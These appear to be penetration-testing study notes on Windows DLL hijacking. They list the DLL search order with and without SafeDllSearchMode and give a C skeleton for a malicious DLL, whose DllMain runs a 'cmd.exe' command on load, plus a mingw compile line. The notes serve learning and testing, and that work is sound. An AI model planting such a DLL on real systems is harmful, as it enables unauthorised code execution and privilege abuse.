DLL Hijacking

author: Nathan Acks
date: 2022-04-22

Windows DLL Search Order

Windows DLL search order if SafeDllSearchMode is enabled:

• The application directory
• The system directory (as returned by GetSystemDirectory())
• The 16-bit (!) system directory
• The Windows directory (as returned by GetWindowsDirectory())
• The current directory (!)
• The system PATH (!)

Windows DLL search order if SafeDllSearchMode is disabled:

• The application directory
• The current directory (!)
• The system directory (as returned by GetSystemDirectory())
• The 16-bit (!) system directory
• The Windows directory (as returned by GetWindowsDirectory())
• The system PATH (!)

Note that it seems more-or-less impossible to determine what DLLs an application is searching for without having SYSTEM access already (so tools like ProcMon can be run).

• 2022-04-21 - TryHackMe: Jr. Penetration Tester
• Exploiting LD_PRELOAD
• Exploiting LD_LIBRARY_PATH

Malicious DLL Skeleton

#include <windows.h>

BOOL WINAPI DllMain
(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
	if (dwReason == DLL_PROCESS_ATTACH) {
		system("cmd.exe /C whoami > C:\Temp\dll.txt");
		ExitProcess(0);
	}
	return TRUE;
}

Compile with mingw (on Linux!):

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll